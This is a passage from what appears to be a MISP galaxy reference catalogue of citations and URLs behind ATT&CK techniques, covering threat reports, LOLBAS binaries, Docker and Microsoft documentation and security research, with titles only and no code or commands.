Links

https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

Chokepoint preload rootkits

stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Chokepoint preload rootkits"

Table 13352. Table References

Links

http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html

Sygnia Golden SAML

Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Sygnia Golden SAML"

Table 13353. Table References

Links

https://www.sygnia.co/golden-saml-advisory

FireEye Exchange Zero Days March 2021

Bromiley, M. et al. (2021, March 4). Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities. Retrieved March 9, 2021.

The tag is: misp-galaxy:references="FireEye Exchange Zero Days March 2021"

Table 13354. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html

Microsoft DEV-0537

Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.

The tag is: misp-galaxy:references="Microsoft DEV-0537"

Table 13355. Table References

Links

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

MSTIC DEV-0537 Mar 2022

MSTIC, DART, M365 Defender. (2022, March 24). DEV-0537 Criminal Actor Targeting Organizations for Data Exfiltration and Destruction. Retrieved May 17, 2022.

The tag is: misp-galaxy:references="MSTIC DEV-0537 Mar 2022"

Table 13356. Table References

Links

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

Microsoft Royal ransomware November 2022

MSTIC. (2022, November 17). DEV-0569 finds new ways to deliver Royal ransomware, various payloads. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Microsoft Royal ransomware November 2022"

Table 13357. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/

Cisco IOS Forensics Developments

Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS Forensics. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Forensics Developments"

Table 13358. Table References

Links

https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf

DeviceCredentialDeployment.exe - LOLBAS Project

LOLBAS. (2021, August 16). DeviceCredentialDeployment.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="DeviceCredentialDeployment.exe - LOLBAS Project"

Table 13359. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/

GitHub mattifestation DeviceGuardBypass

Graeber, M. (2016, November 13). DeviceGuardBypassMitigationRules. Retrieved November 30, 2016.

The tag is: misp-galaxy:references="GitHub mattifestation DeviceGuardBypass"

Table 13360. Table References

Links

https://github.com/mattifestation/DeviceGuardBypassMitigationRules

Devinit.exe - LOLBAS Project

LOLBAS. (2022, January 20). Devinit.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Devinit.exe - LOLBAS Project"

Table 13361. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/

Devtoolslauncher.exe - LOLBAS Project

LOLBAS. (2019, October 4). Devtoolslauncher.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Devtoolslauncher.exe - LOLBAS Project"

Table 13362. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/

devtunnel.exe - LOLBAS Project

LOLBAS. (2023, September 16). devtunnel.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="devtunnel.exe - LOLBAS Project"

Table 13363. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/

Dfshim.dll - LOLBAS Project

LOLBAS. (2018, May 25). Dfshim.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dfshim.dll - LOLBAS Project"

Table 13364. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Dfshim/

Dfsvc.exe - LOLBAS Project

LOLBAS. (2018, May 25). Dfsvc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dfsvc.exe - LOLBAS Project"

Table 13365. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/

dhcp_serv_op_events

Microsoft. (2006, August 31). DHCP Server Operational Events. Retrieved March 7, 2022.

The tag is: misp-galaxy:references="dhcp_serv_op_events"

Table 13366. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800668(v=ws.11)

GitHub Diamorphine

Mello, V. (2018, March 8). Diamorphine - LKM rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.

The tag is: misp-galaxy:references="GitHub Diamorphine"

Table 13367. Table References

Links

https://github.com/m0nad/Diamorphine

diantz.exe_lolbas

Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021.

The tag is: misp-galaxy:references="diantz.exe_lolbas"

Table 13368. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Diantz/

Fortinet Diavol July 2021

Neeamni, D., Rubinfeld, A. (2021, July 1). Diavol - A New Ransomware Used By Wizard Spider?. Retrieved November 12, 2021.

The tag is: misp-galaxy:references="Fortinet Diavol July 2021"

Table 13369. Table References

Links

https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider

DFIR Diavol Ransomware December 2021

DFIR Report. (2021, December 13). Diavol Ransomware. Retrieved March 9, 2022.

The tag is: misp-galaxy:references="DFIR Diavol Ransomware December 2021"

Table 13370. Table References

Links

https://thedfirreport.com/2021/12/13/diavol-ransomware/

Überwachung APT28 Forfiles June 2015

Guarnieri, C. (2015, June 19). Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag. Retrieved January 22, 2018.

The tag is: misp-galaxy:references="Überwachung APT28 Forfiles June 2015"

Table 13371. Table References

Links

https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/

Microsoft DSE June 2017

Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="Microsoft DSE June 2017"

Table 13372. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN

ESET Turla Mosquito Jan 2018

ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="ESET Turla Mosquito Jan 2018"

Table 13373. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf

TechNet Dir

Microsoft. (n.d.). Dir. Retrieved April 18, 2016.

The tag is: misp-galaxy:references="TechNet Dir"

Table 13374. Table References

Links

https://technet.microsoft.com/en-us/library/cc755121.aspx

Frisk DMA August 2016

Ulf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="Frisk DMA August 2016"

Table 13375. Table References

Links

https://www.youtube.com/watch?v=fXthwl6ShOg

Redops Syscalls

Feichter, D. (2023, June 30). Direct Syscalls vs Indirect Syscalls. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Redops Syscalls"

Table 13376. Table References

Links

https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls

GitHub Disable DDEAUTO Oct 2017

Dormann, W. (2017, October 20). Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016. Retrieved February 3, 2018.

The tag is: misp-galaxy:references="GitHub Disable DDEAUTO Oct 2017"

Table 13377. Table References

Links

https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b

Disable automount for ISO

wordmann. (2022, February 8). Disable Disc Image. Retrieved February 8, 2022.

The tag is: misp-galaxy:references="Disable automount for ISO"

Table 13378. Table References

Links

https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7

Disable_Win_Event_Logging

dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.

The tag is: misp-galaxy:references="Disable_Win_Event_Logging"

Table 13379. Table References

Links

https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging

GitHub MOTW

wdormann. (2019, August 29). Disable Windows Explorer file associations for Disc Image Mount. Retrieved April 16, 2022.

The tag is: misp-galaxy:references="GitHub MOTW"

Table 13380. Table References

Links

https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7

Apple Disable SIP

Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="Apple Disable SIP"

Table 13381. Table References

Links

https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection

Microsoft GPO Bluetooth FEB 2009

Microsoft. (2009, February 9). Disabling Bluetooth and Infrared Beaming. Retrieved July 26, 2018.

The tag is: misp-galaxy:references="Microsoft GPO Bluetooth FEB 2009"

Table 13382. Table References

Links

https://technet.microsoft.com/library/dd252791.aspx

ITSyndicate Disabling PHP functions

Kondratiev, A. (n.d.). Disabling dangerous PHP functions. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="ITSyndicate Disabling PHP functions"

Table 13383. Table References

Links

https://itsyndicate.org/blog/disabling-dangerous-php-functions/

disable_notif_synology_ransom

TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved October 19, 2022.

The tag is: misp-galaxy:references="disable_notif_synology_ransom"

Table 13384. Table References

Links

https://twitter.com/TheDFIRReport/status/1498657590259109894

Diskshadow.exe - LOLBAS Project

LOLBAS. (2018, May 25). Diskshadow.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Diskshadow.exe - LOLBAS Project"

Table 13385. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/

Bitdefender FunnyDream Campaign November 2020

Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.

The tag is: misp-galaxy:references="Bitdefender FunnyDream Campaign November 2020"

Table 13386. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf

FireEye NETWIRE March 2019

Maniath, S. and Kadam, P. (2019, March 19). Dissecting a NETWIRE Phishing Campaign’s Usage of Process Hollowing. Retrieved January 7, 2021.

The tag is: misp-galaxy:references="FireEye NETWIRE March 2019"

Table 13387. Table References

Links

https://www.mandiant.com/resources/blog/dissecting-netwire-phishing-campaigns-usage-process-hollowing

Cybereason Dissecting DGAs

Sternfeld, U. (2016). Dissecting Domain Generation Algorithms: Eight Real World DGA Variants. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Cybereason Dissecting DGAs"

Table 13388. Table References

Links

http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf

FireEye POSHSPY April 2017

Dunwoody, M. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.

The tag is: misp-galaxy:references="FireEye POSHSPY April 2017"

Table 13389. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

Microsoft DTC

Microsoft. (2011, January 12). Distributed Transaction Coordinator. Retrieved February 25, 2016.

The tag is: misp-galaxy:references="Microsoft DTC"

Table 13390. Table References

Links

https://technet.microsoft.com/en-us/library/cc759136(v=ws.10).aspx

FireEye DLL Search Order Hijacking

Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="FireEye DLL Search Order Hijacking"

Table 13391. Table References

Links

https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html

Mandiant Search Order

Mandiant. (2010, August 31). DLL Search Order Hijacking Revisited. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Mandiant Search Order"

Table 13392. Table References

Links

https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/

Stewart 2014

Stewart, A. (2014). DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Stewart 2014"

Table 13393. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf

Dnscmd.exe - LOLBAS Project

LOLBAS. (2018, May 25). Dnscmd.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dnscmd.exe - LOLBAS Project"

Table 13394. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/

Dnscmd Microsoft

Microsoft. (2023, February 3). Dnscmd Microsoft. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="Dnscmd Microsoft"

Table 13395. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd

DNS Dumpster

Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="DNS Dumpster"

Table 13396. Table References

Links

https://dnsdumpster.com/

Talos DNSpionage Nov 2018

Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.

The tag is: misp-galaxy:references="Talos DNSpionage Nov 2018"

Table 13397. Table References

Links

https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

Unit42 DNS Mar 2019

Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can be (ab)used by malicious actors. Retrieved October 3, 2020.

The tag is: misp-galaxy:references="Unit42 DNS Mar 2019"

Table 13398. Table References

Links

https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/

dnx.exe - LOLBAS Project

LOLBAS. (2018, May 25). dnx.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="dnx.exe - LOLBAS Project"

Table 13399. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dnx/

Docker Daemon CLI

Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Docker Daemon CLI"

Table 13400. Table References

Links

https://docs.docker.com/engine/reference/commandline/dockerd/

Docker API

Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Docker API"

Table 13401. Table References

Links

https://docs.docker.com/engine/api/v1.41/

Docker Build Image

Docker. (n.d.). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Docker Build Image"

Table 13402. Table References

Links

https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild

Docker Containers API

Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Docker Containers API"

Table 13403. Table References

Links

https://docs.docker.com/engine/api/v1.41/#tag/Container

Docker Exec

Docker. (n.d.). Docker Exec. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Docker Exec"

Table 13404. Table References

Links

https://docs.docker.com/engine/reference/commandline/exec/

Docker Images

Docker. (n.d.). Docker Images. Retrieved April 6, 2021.

The tag is: misp-galaxy:references="Docker Images"

Table 13405. Table References

Links

https://docs.docker.com/engine/reference/commandline/images/

Docker Overview

Docker. (n.d.). Docker Overview. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Docker Overview"

Table 13406. Table References

Links

https://docs.docker.com/get-started/overview/

Docker Entrypoint

Docker. (n.d.). Docker run reference. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Docker Entrypoint"

Table 13407. Table References

Links

https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime

TechNet Server Operator Scheduled Task

Microsoft. (2012, November 15). Domain controller: Allow server operators to schedule tasks. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="TechNet Server Operator Scheduled Task"

Table 13408. Table References

Links

https://technet.microsoft.com/library/jj852168.aspx

Cisco Umbrella DGA

Scarfo, A. (2016, October 10). Domain Generation Algorithms – Why so effective?. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Cisco Umbrella DGA"

Table 13409. Table References

Links

https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/

Microsoft GetAllTrustRelationships

Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Microsoft GetAllTrustRelationships"

Table 13410. Table References

Links

https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships

ICANNDomainNameHijacking

ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="ICANNDomainNameHijacking"

Table 13411. Table References

Links

https://www.icann.org/groups/ssac/documents/sac-007-en

Palo Alto Unit 42 Domain Shadowing 2022

Janos Szurdi, Rebekah Houser and Daiping Liu. (2022, September 21). Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="Palo Alto Unit 42 Domain Shadowing 2022"

Table 13412. Table References

Links

https://unit42.paloaltonetworks.com/domain-shadowing/

ASERT Donot March 2018

Schwarz, D., Sopko, J. (2018, March 08). Donot Team Leverages New Modular Malware Framework in South Asia. Retrieved June 11, 2018.

The tag is: misp-galaxy:references="ASERT Donot March 2018"

Table 13413. Table References

Links

https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/

Mandiant URL Obfuscation 2023

Nick Simonian. (2023, May 22). Don’t @ Me: URL Obfuscation Through Schema Abuse. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="Mandiant URL Obfuscation 2023"

Table 13414. Table References

Links

https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse

Donut Github

TheWover. (2019, May 9). donut. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Donut Github"

Table 13415. Table References

Links

https://github.com/TheWover/donut

Introducing Donut

The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Introducing Donut"

Table 13416. Table References

Links

https://thewover.github.io/Introducing-Donut/

Dotnet.exe - LOLBAS Project

LOLBAS. (2019, November 12). Dotnet.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dotnet.exe - LOLBAS Project"

Table 13417. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/

cyberproof-double-bounce

Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing. Retrieved February 24, 2023.

The tag is: misp-galaxy:references="cyberproof-double-bounce"

Table 13418. Table References

Links

https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends

FireEye APT41 Aug 2019

Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.

The tag is: misp-galaxy:references="FireEye APT41 Aug 2019"

Table 13419. Table References

Links

https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf

FireEye APT41 2019

FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.

The tag is: misp-galaxy:references="FireEye APT41 2019"

Table 13420. Table References

Links

https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf

Malwarebytes IssacWiper CaddyWiper March 2022

Threat Intelligence Team. (2022, March 18). Double header: IsaacWiper and CaddyWiper. Retrieved April 11, 2022.

The tag is: misp-galaxy:references="Malwarebytes IssacWiper CaddyWiper March 2022"

Table 13421. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/

tlseminar_downgrade_att

Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.

The tag is: misp-galaxy:references="tlseminar_downgrade_att"

Table 13422. Table References

Links

https://tlseminar.github.io/downgrade-attacks/

LogRhythm Do You Trust Oct 2014

Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.

The tag is: misp-galaxy:references="LogRhythm Do You Trust Oct 2014"

Table 13423. Table References

Links

https://logrhythm.com/blog/do-you-trust-your-computer/

VNC Vulnerabilities

Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="VNC Vulnerabilities"

Table 13424. Table References

Links

https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/

Accenture Dragonfish Jan 2018

Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018.

The tag is: misp-galaxy:references="Accenture Dragonfish Jan 2018"

Table 13425. Table References

Links

https://www.accenture.com/t20180127T003755Z_w/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf

Symantec Dragonfly

Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.

The tag is: misp-galaxy:references="Symantec Dragonfly"

Table 13426. Table References

Links

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

Symantec Dragonfly Sept 2017

Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.

The tag is: misp-galaxy:references="Symantec Dragonfly Sept 2017"

Table 13427. Table References

Links

https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers

Symantec Dragonfly 2.0 October 2017

Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.

The tag is: misp-galaxy:references="Symantec Dragonfly 2.0 October 2017"

Table 13428. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks

Kaspersky Dridex May 2017

Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019.

The tag is: misp-galaxy:references="Kaspersky Dridex May 2017"

Table 13429. Table References

Links

https://securelist.com/dridex-a-history-of-evolution/78531/

Dell Dridex Oct 2015

Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.

The tag is: misp-galaxy:references="Dell Dridex Oct 2015"

Table 13430. Table References

Links

https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation

Red Canary Dridex Threat Report 2021

Red Canary. (2021, February 9). Dridex - Red Canary Threat Detection Report. Retrieved August 3, 2023.

The tag is: misp-galaxy:references="Red Canary Dridex Threat Report 2021"

Table 13431. Table References

Links

https://redcanary.com/threat-detection-report/threats/dridex/

volexity_0day_sophos_FW

Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.

The tag is: misp-galaxy:references="volexity_0day_sophos_FW"

Table 13432. Table References

Links

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

Microsoft Driverquery

Microsoft. (n.d.). driverquery. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="Microsoft Driverquery"

Table 13433. Table References

Links

https://learn.microsoft.com/windows-server/administration/windows-commands/driverquery

Dropbox Malware Sync

David Talbot. (2013, August 21). Dropbox and Similar Services Can Sync Malware. Retrieved May 31, 2023.

The tag is: misp-galaxy:references="Dropbox Malware Sync"

Table 13434. Table References

Links

https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/

Cyberreason Anchor December 2019

Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.

The tag is: misp-galaxy:references="Cyberreason Anchor December 2019"

Table 13435. Table References

Links

https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware

Samba DRSUAPI

SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Samba DRSUAPI"

Table 13436. Table References

Links

https://wiki.samba.org/index.php/DRSUAPI

dsdbutil.exe - LOLBAS Project

LOLBAS. (2023, May 31). dsdbutil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="dsdbutil.exe - LOLBAS Project"

Table 13437. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dsdbutil/

TechNet Dsquery

Microsoft. (n.d.). Dsquery. Retrieved April 18, 2016.

The tag is: misp-galaxy:references="TechNet Dsquery"

Table 13438. Table References

Links

https://technet.microsoft.com/en-us/library/cc732952.aspx

CyberBit Dtrack

Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021.

The tag is: misp-galaxy:references="CyberBit Dtrack"

Table 13439. Table References

Links

https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/

Kaspersky Dtrack

Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021.

The tag is: misp-galaxy:references="Kaspersky Dtrack"

Table 13440. Table References

Links

https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers

Crowdstrike Qakbot October 2020

CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Crowdstrike Qakbot October 2020"

Table 13441. Table References

Links

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/

Dump64.exe - LOLBAS Project

LOLBAS. (2021, November 16). Dump64.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dump64.exe - LOLBAS Project"

Table 13442. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dump64/

dump_pwd_dcsync

Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.

The tag is: misp-galaxy:references="dump_pwd_dcsync"

Table 13443. Table References

Links

https://adsecurity.org/?p=2053

ired mscache

Mantvydas Baranauskas. (2019, November 16). Dumping and Cracking mscash - Cached Domain Credentials. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="ired mscache"

Table 13444. Table References

Links

https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials

ired Dumping LSA Secrets

Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="ired Dumping LSA Secrets"

Table 13445. Table References

Links

https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets

DumpMinitool.exe - LOLBAS Project

LOLBAS. (2022, January 20). DumpMinitool.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="DumpMinitool.exe - LOLBAS Project"

Table 13446. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/

Wikipedia Duqu

Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.

The tag is: misp-galaxy:references="Wikipedia Duqu"

Table 13447. Table References

Links

https://en.wikipedia.org/wiki/Duqu

Dxcap.exe - LOLBAS Project

LOLBAS. (2018, May 25). Dxcap.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dxcap.exe - LOLBAS Project"

Table 13448. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/

TheEvilBit DYLD_INSERT_LIBRARIES

Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020.

The tag is: misp-galaxy:references="TheEvilBit DYLD_INSERT_LIBRARIES"

Table 13449. Table References

Links

https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/

Wardle Dylib Hijacking OSX 2015

Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Wardle Dylib Hijacking OSX 2015"

Table 13450. Table References

Links

https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf

Dragos DYMALLOY

Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.

The tag is: misp-galaxy:references="Dragos DYMALLOY"

Table 13451. Table References

Links

https://www.dragos.com/threat/dymalloy/

MWRInfoSecurity Dynamic Hooking 2015

Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User Mode. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="MWRInfoSecurity Dynamic Hooking 2015"

Table 13452. Table References

Links

https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/

rfc2131

Droms, R. (1997, March). Dynamic Host Configuration Protocol. Retrieved March 9, 2022.

The tag is: misp-galaxy:references="rfc2131"

Table 13453. Table References

Links

https://datatracker.ietf.org/doc/html/rfc2131

rfc3315

